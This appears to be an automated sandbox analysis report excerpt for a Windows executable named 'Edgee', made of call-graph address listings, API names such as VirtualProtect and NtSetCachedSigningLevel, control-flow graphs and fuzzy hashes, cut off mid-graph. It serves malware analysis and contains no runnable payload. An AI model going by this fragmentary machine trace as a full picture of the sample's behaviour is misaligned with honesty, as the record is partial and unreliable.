7ff6d96d1503 4020->4021 4022 7ff6d96d1394 2 API calls 4020->4022 4023 7ff6d96d1394 2 API calls 4021->4023 4022->4021 4024 7ff6d96d150d 4023->4024 4025 7ff6d96d1512 4024->4025 4026 7ff6d96d1394 2 API calls 4024->4026 4027 7ff6d96d1394 2 API calls 4025->4027 4026->4025 4028 7ff6d96d1521 4027->4028 4029 7ff6d96d1394 2 API calls 4028->4029 4030 7ff6d96d152b 4029->4030 4031 7ff6d96d1530 4030->4031 4032 7ff6d96d1394 2 API calls 4030->4032 4033 7ff6d96d1394 2 API calls 4031->4033 4032->4031 4034 7ff6d96d153a 4033->4034 4035 7ff6d96d153f 4034->4035 4036 7ff6d96d1394 2 API calls 4034->4036 4037 7ff6d96d1394 2 API calls 4035->4037 4036->4035 4038 7ff6d96d154e 4037->4038 4039 7ff6d96d1394 2 API calls 4038->4039 4040 7ff6d96d1558 4039->4040 4041 7ff6d96d155d 4040->4041 4042 7ff6d96d1394 2 API calls 4040->4042 4043 7ff6d96d1394 2 API calls 4041->4043 4042->4041 4044 7ff6d96d1567 4043->4044 4045 7ff6d96d156c 4044->4045 4046 7ff6d96d1394 2 API calls 4044->4046 4047 7ff6d96d1394 2 API calls 4045->4047 4046->4045 4048 7ff6d96d1576 4047->4048 4049 7ff6d96d157b 4048->4049 4050 7ff6d96d1394 2 API calls 4048->4050 4051 7ff6d96d1394 2 API calls 4049->4051 4050->4049 4052 7ff6d96d158a 4051->4052 4053 7ff6d96d1394 2 API calls 4052->4053 4054 7ff6d96d1599 4053->4054 4055 7ff6d96d1394 2 API calls 4054->4055 4056 7ff6d96d15a3 4055->4056 4057 7ff6d96d15a8 4056->4057 4058 7ff6d96d1394 2 API calls 4056->4058 4059 7ff6d96d1394 2 API calls 4057->4059 4058->4057 4060 7ff6d96d15b7 4059->4060 4061 7ff6d96d1394 2 API calls 4060->4061 4062 7ff6d96d15c1 4061->4062 4063 7ff6d96d1394 2 API calls 4062->4063 4064 7ff6d96d15c6 4063->4064 4065 7ff6d96d1394 2 API calls 4064->4065 4066 7ff6d96d15d5 4065->4066 4067 7ff6d96d1394 2 API calls 4066->4067 4068 7ff6d96d15e4 4067->4068 4069 7ff6d96d1394 2 API calls 4068->4069 4070 7ff6d96d15f3 4069->4070 4070->3578 4072 7ff6d96d1394 2 API calls 4071->4072 4073 7ff6d96d14c7 4072->4073 4074 7ff6d96d1394 2 API calls 4073->4074 4075 7ff6d96d14d6 4074->4075 4076 7ff6d96d1394 2 API calls 4075->4076 4077 7ff6d96d14e5 4076->4077 4078 7ff6d96d1394 2 API calls 4077->4078 4079 7ff6d96d14f4 4078->4079 4080 7ff6d96d1503 4079->4080 4081 7ff6d96d1394 2 API calls 4079->4081 4082 7ff6d96d1394 2 API calls 4080->4082 4081->4080 4083 7ff6d96d150d 4082->4083 4084 7ff6d96d1512 4083->4084 4085 7ff6d96d1394 2 API calls 4083->4085 4086 7ff6d96d1394 2 API calls 4084->4086 4085->4084 4087 7ff6d96d1521 4086->4087 4088 7ff6d96d1394 2 API calls 4087->4088 4089 7ff6d96d152b 4088->4089 4090 7ff6d96d1530 4089->4090 4091 7ff6d96d1394 2 API calls 4089->4091 4092 7ff6d96d1394 2 API calls 4090->4092 4091->4090 4093 7ff6d96d153a 4092->4093 4094 7ff6d96d153f 4093->4094 4095 7ff6d96d1394 2 API calls 4093->4095 4096 7ff6d96d1394 2 API calls 4094->4096 4095->4094 4097 7ff6d96d154e 4096->4097 4098 7ff6d96d1394 2 API calls 4097->4098 4099 7ff6d96d1558 4098->4099 4100 7ff6d96d155d 4099->4100 4101 7ff6d96d1394 2 API calls 4099->4101 4102 7ff6d96d1394 2 API calls 4100->4102 4101->4100 4103 7ff6d96d1567 4102->4103 4104 7ff6d96d156c 4103->4104 4105 7ff6d96d1394 2 API calls 4103->4105 4106 7ff6d96d1394 2 API calls 4104->4106 4105->4104 4107 7ff6d96d1576 4106->4107 4108 7ff6d96d157b 4107->4108 4109 7ff6d96d1394 2 API calls 4107->4109 4110 7ff6d96d1394 2 API calls 4108->4110 4109->4108 4111 7ff6d96d158a 4110->4111 4112 7ff6d96d1394 2 API calls 4111->4112 4113 7ff6d96d1599 4112->4113 4114 7ff6d96d1394 2 API calls 4113->4114 4115 7ff6d96d15a3 4114->4115 4116 7ff6d96d15a8 4115->4116 4117 7ff6d96d1394 2 API calls 4115->4117 4118 7ff6d96d1394 2 API calls 4116->4118 4117->4116 4119 7ff6d96d15b7 4118->4119 4120 7ff6d96d1394 2 API calls 4119->4120 4121 7ff6d96d15c1 4120->4121 4122 7ff6d96d1394 2 API calls 4121->4122 4123 7ff6d96d15c6 4122->4123 4124 7ff6d96d1394 2 API calls 4123->4124 4125 7ff6d96d15d5 4124->4125 4126 7ff6d96d1394 2 API calls 4125->4126 4127 7ff6d96d15e4 4126->4127 4128 7ff6d96d1394 2 API calls 4127->4128 4129 7ff6d96d15f3 4128->4129 4129->3655 4131 7ff6d96d1394 2 API calls 4130->4131 4132 7ff6d96d15e4 4131->4132 4133 7ff6d96d1394 2 API calls 4132->4133 4134 7ff6d96d15f3 4133->4134 4134->3655 4136 7ff6d96d1394 2 API calls 4135->4136 4137 7ff6d96d1495 4136->4137 4138 7ff6d96d149a 4137->4138 4139 7ff6d96d1394 2 API calls 4137->4139 4140 7ff6d96d1394 2 API calls 4138->4140 4139->4138 4141 7ff6d96d14a4 4140->4141 4142 7ff6d96d14a9 4141->4142 4143 7ff6d96d1394 2 API calls 4141->4143 4144 7ff6d96d1394 2 API calls 4142->4144 4143->4142 4145 7ff6d96d14b3 4144->4145 4146 7ff6d96d1394 2 API calls 4145->4146 4147 7ff6d96d14b8 4146->4147 4148 7ff6d96d1394 2 API calls 4147->4148 4149 7ff6d96d14c7 4148->4149 4150 7ff6d96d1394 2 API calls 4149->4150 4151 7ff6d96d14d6 4150->4151 4152 7ff6d96d1394 2 API calls 4151->4152 4153 7ff6d96d14e5 4152->4153 4154 7ff6d96d1394 2 API calls 4153->4154 4155 7ff6d96d14f4 4154->4155 4156 7ff6d96d1503 4155->4156 4157 7ff6d96d1394 2 API calls 4155->4157 4158 7ff6d96d1394 2 API calls 4156->4158 4157->4156 4159 7ff6d96d150d 4158->4159 4160 7ff6d96d1512 4159->4160 4161 7ff6d96d1394 2 API calls 4159->4161 4162 7ff6d96d1394 2 API calls 4160->4162 4161->4160 4163 7ff6d96d1521 4162->4163 4164 7ff6d96d1394 2 API calls 4163->4164 4165 7ff6d96d152b 4164->4165 4166 7ff6d96d1530 4165->4166 4167 7ff6d96d1394 2 API calls 4165->4167 4168 7ff6d96d1394 2 API calls 4166->4168 4167->4166 4169 7ff6d96d153a 4168->4169 4170 7ff6d96d153f 4169->4170 4171 7ff6d96d1394 2 API calls 4169->4171 4172 7ff6d96d1394 2 API calls 4170->4172 4171->4170 4173 7ff6d96d154e 4172->4173 4174 7ff6d96d1394 2 API calls 4173->4174 4175 7ff6d96d1558 4174->4175 4176 7ff6d96d155d 4175->4176 4177 7ff6d96d1394 2 API calls 4175->4177 4178 7ff6d96d1394 2 API calls 4176->4178 4177->4176 4179 7ff6d96d1567 4178->4179 4180 7ff6d96d156c 4179->4180 4181 7ff6d96d1394 2 API calls 4179->4181 4182 7ff6d96d1394 2 API calls 4180->4182 4181->4180 4183 7ff6d96d1576 4182->4183 4184 7ff6d96d157b 4183->4184 4185 7ff6d96d1394 2 API calls 4183->4185 4186 7ff6d96d1394 2 API calls 4184->4186 4185->4184 4187 7ff6d96d158a 4186->4187 4188 7ff6d96d1394 2 API calls 4187->4188 4189 7ff6d96d1599 4188->4189 4190 7ff6d96d1394 2 API calls 4189->4190 4191 7ff6d96d15a3 4190->4191 4192 7ff6d96d15a8 4191->4192 4193 7ff6d96d1394 2 API calls 4191->4193 4194 7ff6d96d1394 2 API calls 4192->4194 4193->4192 4195 7ff6d96d15b7 4194->4195 4196 7ff6d96d1394 2 API calls 4195->4196 4197 7ff6d96d15c1 4196->4197 4198 7ff6d96d1394 2 API calls 4197->4198 4199 7ff6d96d15c6 4198->4199 4200 7ff6d96d1394 2 API calls 4199->4200 4201 7ff6d96d15d5 4200->4201 4202 7ff6d96d1394 2 API calls 4201->4202 4203 7ff6d96d15e4 4202->4203 4204 7ff6d96d1394 2 API calls 4203->4204 4205 7ff6d96d15f3 4204->4205 4205->3653 4206 7ff6d96d149a 4205->4206 4207 7ff6d96d1394 2 API calls 4206->4207 4208 7ff6d96d14a4 4207->4208 4209 7ff6d96d14a9 4208->4209 4210 7ff6d96d1394 2 API calls 4208->4210 4211 7ff6d96d1394 2 API calls 4209->4211 4210->4209 4212 7ff6d96d14b3 4211->4212 4213 7ff6d96d1394 2 API calls 4212->4213 4214 7ff6d96d14b8 4213->4214 4215 7ff6d96d1394 2 API calls 4214->4215 4216 7ff6d96d14c7 4215->4216 4217 7ff6d96d1394 2 API calls 4216->4217 4218 7ff6d96d14d6 4217->4218 4219 7ff6d96d1394 2 API calls 4218->4219 4220 7ff6d96d14e5 4219->4220 4221 7ff6d96d1394 2 API calls 4220->4221 4222 7ff6d96d14f4 4221->4222 4223 7ff6d96d1503 4222->4223 4224 7ff6d96d1394 2 API calls 4222->4224 4225 7ff6d96d1394 2 API calls 4223->4225 4224->4223 4226 7ff6d96d150d 4225->4226 4227 7ff6d96d1512 4226->4227 4228 7ff6d96d1394 2 API calls 4226->4228 4229 7ff6d96d1394 2 API calls 4227->4229 4228->4227 4230 7ff6d96d1521 4229->4230 4231 7ff6d96d1394 2 API calls 4230->4231 4232 7ff6d96d152b 4231->4232 4233 7ff6d96d1530 4232->4233 4234 7ff6d96d1394 2 API calls 4232->4234 4235 7ff6d96d1394 2 API calls 4233->4235 4234->4233 4236 7ff6d96d153a 4235->4236 4237 7ff6d96d153f 4236->4237 4238 7ff6d96d1394 2 API calls 4236->4238 4239 7ff6d96d1394 2 API calls 4237->4239 4238->4237 4240 7ff6d96d154e 4239->4240 4241 7ff6d96d1394 2 API calls 4240->4241 4242 7ff6d96d1558 4241->4242 4243 7ff6d96d155d 4242->4243 4244 7ff6d96d1394 2 API calls 4242->4244 4245 7ff6d96d1394 2 API calls 4243->4245 4244->4243 4246 7ff6d96d1567 4245->4246 4247 7ff6d96d156c 4246->4247 4248 7ff6d96d1394 2 API calls 4246->4248 4249 7ff6d96d1394 2 API calls 4247->4249 4248->4247 4250 7ff6d96d1576 4249->4250 4251 7ff6d96d157b 4250->4251 4252 7ff6d96d1394 2 API calls 4250->4252 4253 7ff6d96d1394 2 API calls 4251->4253 4252->4251 4254 7ff6d96d158a 4253->4254 4255 7ff6d96d1394 2 API calls 4254->4255 4256 7ff6d96d1599 4255->4256 4257 7ff6d96d1394 2 API calls 4256->4257 4258 7ff6d96d15a3 4257->4258 4259 7ff6d96d15a8 4258->4259 4260 7ff6d96d1394 2 API calls 4258->4260 4261 7ff6d96d1394 2 API calls 4259->4261 4260->4259 4262 7ff6d96d15b7 4261->4262 4263 7ff6d96d1394 2 API calls 4262->4263 4264 7ff6d96d15c1 4263->4264 4265 7ff6d96d1394 2 API calls 4264->4265 4266 7ff6d96d15c6 4265->4266 4267 7ff6d96d1394 2 API calls 4266->4267 4268 7ff6d96d15d5 4267->4268 4269 7ff6d96d1394 2 API calls 4268->4269 4270 7ff6d96d15e4 4269->4270 4271 7ff6d96d1394 2 API calls 4270->4271 4272 7ff6d96d15f3 4271->4272 4272->3653 4272->3658 4274 7ff6d96d1394 2 API calls 4273->4274 4275 7ff6d96d1486 4274->4275 4276 7ff6d96d148b 4275->4276 4277 7ff6d96d1394 2 API calls 4275->4277 4278 7ff6d96d1394 2 API calls 4276->4278 4277->4276 4279 7ff6d96d1495 4278->4279 4280 7ff6d96d149a 4279->4280 4281 7ff6d96d1394 2 API calls 4279->4281 4282 7ff6d96d1394 2 API calls 4280->4282 4281->4280 4283 7ff6d96d14a4 4282->4283 4284 7ff6d96d14a9 4283->4284 4285 7ff6d96d1394 2 API calls 4283->4285 4286 7ff6d96d1394 2 API calls 4284->4286 4285->4284 4287 7ff6d96d14b3 4286->4287 4288 7ff6d96d1394 2 API calls 4287->4288 4289 7ff6d96d14b8 4288->4289 4290 7ff6d96d1394 2 API calls 4289->4290 4291 7ff6d96d14c7 4290->4291 4292 7ff6d96d1394 2 API calls 4291->4292 4293 7ff6d96d14d6 4292->4293 4294 7ff6d96d1394 2 API calls 4293->4294 4295 7ff6d96d14e5 4294->4295 4296 7ff6d96d1394 2 API calls 4295->4296 4297 7ff6d96d14f4 4296->4297 4298 7ff6d96d1503 4297->4298 4299 7ff6d96d1394 2 API calls 4297->4299 4300 7ff6d96d1394 2 API calls 4298->4300 4299->4298 4301 7ff6d96d150d 4300->4301 4302 7ff6d96d1512 4301->4302 4303 7ff6d96d1394 2 API calls 4301->4303 4304 7ff6d96d1394 2 API calls 4302->4304 4303->4302 4305 7ff6d96d1521 4304->4305 4306 7ff6d96d1394 2 API calls 4305->4306 4307 7ff6d96d152b 4306->4307 4308 7ff6d96d1530 4307->4308 4309 7ff6d96d1394 2 API calls 4307->4309 4310 7ff6d96d1394 2 API calls 4308->4310 4309->4308 4311 7ff6d96d153a 4310->4311 4312 7ff6d96d153f 4311->4312 4313 7ff6d96d1394 2 API calls 4311->4313 4314 7ff6d96d1394 2 API calls 4312->4314 4313->4312 4315 7ff6d96d154e 4314->4315 4316 7ff6d96d1394 2 API calls 4315->4316 4317 7ff6d96d1558 4316->4317 4318 7ff6d96d155d 4317->4318 4319 7ff6d96d1394 2 API calls 4317->4319 4320 7ff6d96d1394 2 API calls 4318->4320 4319->4318 4321 7ff6d96d1567 4320->4321 4322 7ff6d96d156c 4321->4322 4323 7ff6d96d1394 2 API calls 4321->4323 4324 7ff6d96d1394 2 API calls 4322->4324 4323->4322 4325 7ff6d96d1576 4324->4325 4326 7ff6d96d157b 4325->4326 4327 7ff6d96d1394 2 API calls 4325->4327 4328 7ff6d96d1394 2 API calls 4326->4328 4327->4326 4329 7ff6d96d158a 4328->4329 4330 7ff6d96d1394 2 API calls 4329->4330 4331 7ff6d96d1599 4330->4331 4332 7ff6d96d1394 2 API calls 4331->4332 4333 7ff6d96d15a3 4332->4333 4334 7ff6d96d15a8 4333->4334 4335 7ff6d96d1394 2 API calls 4333->4335 4336 7ff6d96d1394 2 API calls 4334->4336 4335->4334 4337 7ff6d96d15b7 4336->4337 4338 7ff6d96d1394 2 API calls 4337->4338 4339 7ff6d96d15c1 4338->4339 4340 7ff6d96d1394 2 API calls 4339->4340 4341 7ff6d96d15c6 4340->4341 4342 7ff6d96d1394 2 API calls 4341->4342 4343 7ff6d96d15d5 4342->4343 4344 7ff6d96d1394 2 API calls 4343->4344 4345 7ff6d96d15e4 4344->4345 4346 7ff6d96d1394 2 API calls 4345->4346 4347 7ff6d96d15f3 4346->4347 4347->3663 4349 7ff6d96d1394 2 API calls 4348->4349 4350 7ff6d96d15d5 4349->4350 4351 7ff6d96d1394 2 API calls 4350->4351 4352 7ff6d96d15e4 4351->4352 4353 7ff6d96d1394 2 API calls 4352->4353 4354 7ff6d96d15f3 4353->4354 4354->3644 4369 7ff6d96d2320 strlen 4370 7ff6d96d2337 4369->4370 4490 7ff6d96d1000 4491 7ff6d96d108b __set_app_type 4490->4491 4492 7ff6d96d1040 4490->4492 4494 7ff6d96d10b6 4491->4494 4492->4491 4493 7ff6d96d10e5 4494->4493 4496 7ff6d96d1e00 4494->4496 4497 7ff6d96d7de0 __setusermatherr 4496->4497 4498 7ff6d96d1800 4499 7ff6d96d1812 4498->4499 4500 7ff6d96d1835 fprintf 4499->4500

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 2643109117-0
                                                                        • Opcode ID: aeeb52fd5712a361e2da6e26dffb6e8464a4deb846e01eb2e9d82df5293092f4
                                                                        • Instruction ID: e77825d4e2cfbc0e100c67d9d7cd018207be3360073a898209b1497e67b34d63
                                                                        • Opcode Fuzzy Hash: aeeb52fd5712a361e2da6e26dffb6e8464a4deb846e01eb2e9d82df5293092f4
                                                                        • Instruction Fuzzy Hash: AF517A31A0968285F7549F56E94437E23A0AFC9784F695033C92DC73A2DF7CE8A5A340

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • NtSetCachedSigningLevel.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D96D1156), ref: 00007FF6D96D13F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: CachedLevelSigning
                                                                        • String ID:
                                                                        • API String ID: 1154981884-0
                                                                        • Opcode ID: e4240df5c98d2c5786ee7734f75f297ed30777c359ba7612eed9737ec24f9522
                                                                        • Instruction ID: 5d99f9e0b738fd5ba9d33f4621720466938e8d9dc1d9686f623a2def9d7dd890
                                                                        • Opcode Fuzzy Hash: e4240df5c98d2c5786ee7734f75f297ed30777c359ba7612eed9737ec24f9522
                                                                        • Instruction Fuzzy Hash: 81F09C7190CB8186E610DF52F85156E7760FBC9788B20943AF9AC83725DF3CE160DB84

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: memset$wcscatwcscpywcslen
                                                                        • String ID: $0$0$@$@
                                                                        • API String ID: 4263182637-1413854666
                                                                        • Opcode ID: f7b098571e4ed3b7eec5741f980412e30988114217fb30f33e78ca92afe78e4c
                                                                        • Instruction ID: ad8052b40750ceffcf13baf36a5557adf6891a08092363305888ebfac1f0ebca
                                                                        • Opcode Fuzzy Hash: f7b098571e4ed3b7eec5741f980412e30988114217fb30f33e78ca92afe78e4c
                                                                        • Instruction Fuzzy Hash: 25B1886190CAC285F7618F14E4057BFB7A0FBC4748F540236EA89867A6DF7CE16ADB40

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                        • String ID: 0$X$`
                                                                        • API String ID: 329590056-2527496196
                                                                        • Opcode ID: b9bb3efecb3ff639fed478dd9ffba46010662aa7922eff09eb78b373566c2b69
                                                                        • Instruction ID: ca98410af7b0857554b0527cfde25ab97f1b9579a087761160768c6734ae2b9f
                                                                        • Opcode Fuzzy Hash: b9bb3efecb3ff639fed478dd9ffba46010662aa7922eff09eb78b373566c2b69
                                                                        • Instruction Fuzzy Hash: 98027B22908BC181F7608F15E8443BE77A4FB857A8F584236DAAC877A6DF7CD159C700

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF6D96D9418,00007FF6D96D9418,?,?,00007FF6D96D0000,?,00007FF6D96D1991), ref: 00007FF6D96D1C63
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF6D96D9418,00007FF6D96D9418,?,?,00007FF6D96D0000,?,00007FF6D96D1991), ref: 00007FF6D96D1CC7
                                                                        • memcpy.MSVCRT ref: 00007FF6D96D1CE0
                                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF6D96D9418,00007FF6D96D9418,?,?,00007FF6D96D0000,?,00007FF6D96D1991), ref: 00007FF6D96D1D23
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                        • API String ID: 2595394609-2123141913
                                                                        • Opcode ID: 80ef160fb769c8a310db049c65ca43167cbfea638bfcc1d561bc1c1716d0c638
                                                                        • Instruction ID: dc0678615e116df2af184d9acc4c332e2fffbd5da81537486122343fdc4dc5ff
                                                                        • Opcode Fuzzy Hash: 80ef160fb769c8a310db049c65ca43167cbfea638bfcc1d561bc1c1716d0c638
                                                                        • Instruction Fuzzy Hash: 78418F61A08A8285FA648F42D8846BD2761EFC9BD4F664033CE2DC7391DF7CE565E300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                        • String ID:
                                                                        • API String ID: 3326252324-0
                                                                        • Opcode ID: 3a29a66536c40fc68ff0253b6a4c3b0ab77415f4f1f5f474e552cc69f7c7c273
                                                                        • Instruction ID: 0c2916c15b2f75445762e4004cd99be2b025f1bd6d0492584413570d8e85ced3
                                                                        • Opcode Fuzzy Hash: 3a29a66536c40fc68ff0253b6a4c3b0ab77415f4f1f5f474e552cc69f7c7c273
                                                                        • Instruction Fuzzy Hash: 9721F130E0968381FAA58F52D94037D2360BF96B95F645033D92DCB7A5DF3CE866A300

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 603 7ff6d96d1e10-7ff6d96d1e2d 604 7ff6d96d1e3e-7ff6d96d1e48 603->604 605 7ff6d96d1e2f-7ff6d96d1e38 603->605 607 7ff6d96d1ea3-7ff6d96d1ea8 604->607 608 7ff6d96d1e4a-7ff6d96d1e53 604->608 605->604 606 7ff6d96d1f60-7ff6d96d1f69 605->606 607->606 611 7ff6d96d1eae-7ff6d96d1eb3 607->611 609 7ff6d96d1e55-7ff6d96d1e60 608->609 610 7ff6d96d1ecc-7ff6d96d1ed1 608->610 609->607 614 7ff6d96d1f23-7ff6d96d1f2d 610->614 615 7ff6d96d1ed3-7ff6d96d1ee2 signal 610->615 612 7ff6d96d1eb5-7ff6d96d1eba 611->612 613 7ff6d96d1efb-7ff6d96d1f0a call 7ff6d96d7df0 611->613 612->606 616 7ff6d96d1ec0 612->616 613->614 625 7ff6d96d1f0c-7ff6d96d1f10 613->625 618 7ff6d96d1f43-7ff6d96d1f45 614->618 619 7ff6d96d1f2f-7ff6d96d1f3f 614->619 615->614 617 7ff6d96d1ee4-7ff6d96d1ee8 615->617 616->614 621 7ff6d96d1f4e-7ff6d96d1f53 617->621 622 7ff6d96d1eea-7ff6d96d1ef9 signal 617->622 618->606 624 7ff6d96d1f5a 619->624 621->624 622->606 624->606 626 7ff6d96d1f12-7ff6d96d1f21 signal 625->626 627 7ff6d96d1f55 625->627 626->606 626->614 627->624
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1728850326.00007FF6D96D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D96D0000, based on PE: true
                                                                        • Associated: 00000011.00000002.1728835891.00007FF6D96D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728863861.00007FF6D96D8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1728876633.00007FF6D96DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000011.00000002.1729030219.00007FF6D9953000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ff6d96d0000_Edgee.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CCG
                                                                        • API String ID: 0-1584390748
                                                                        • Opcode ID: c8c41ab9f220862b7d35ce4fa0b9d5211a85f395b094bb85a6da21781a4b1460
                                                                        • Instruction ID: 8be7e7064ef0e5000c738e4a79fd7d12ccdfd0420b6d649d361c9549266b6983
                                                                        • Opcode Fuzzy Hash: c8c41ab9f220862b7d35ce4fa0b9d5211a85f395b094bb85a6da21781a4b1460
                                                                        • Instruction Fuzzy Hash: 78217C22E0818642FA7D4E54959037D11C19FC97A4F7A8133DA2DC73D5DFACB8A2A341

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 628 7ff6d96d1880-7ff6d96d189c 629 7ff6d96d18a2-7ff6d96d18f9 call 7ff6d96d2420 call 7ff6d96d2660 628->629 630 7ff6d96d1a0f-7ff6d96d1a1f 628->630 629->630 635 7ff6d96d18ff-7ff6d96d1910 629->635 636 7ff6d96d1912-7ff6d96d191c 635->636 637 7ff6d96d193e-7ff6d96d1941 635->637 638 7ff6d96d191e-7ff6d96d1929 636->638 639 7ff6d96d194d-7ff6d96d1954 636->639 637->639 640 7ff6d96d1943-7ff6d96d1947 637->640 638->639 641 7ff6d96d192b-7ff6d96d193a 638->641 643 7ff6d96d199e-7ff6d96d19a6 639->643 644 7ff6d96d1956-7ff6d96d1961 639->644 640->639 642 7ff6d96d1a20-7ff6d96d1a26 640->642 641->637 645 7ff6d96d1a2c-7ff6d96d1a37 642->645 646 7ff6d96d1b87-7ff6d96d1b98 call 7ff6d96d1d40 642->646 643->630 648 7ff6d96d19a8-7ff6d96d19c1 643->648 647 7ff6d96d1970-7ff6d96d199c call 7ff6d96d1ba0 644->647 645->643 649 7ff6d96d1a3d-7ff6d96d1a5f 645->649 647->643 652 7ff6d96d19df-7ff6d96d19e7 648->652 653 7ff6d96d1a7d-7ff6d96d1a97 649->653 656 7ff6d96d19d0-7ff6d96d19dd 652->656 657 7ff6d96d19e9-7ff6d96d1a0d VirtualProtect 652->657 658 7ff6d96d1b74-7ff6d96d1b82 call 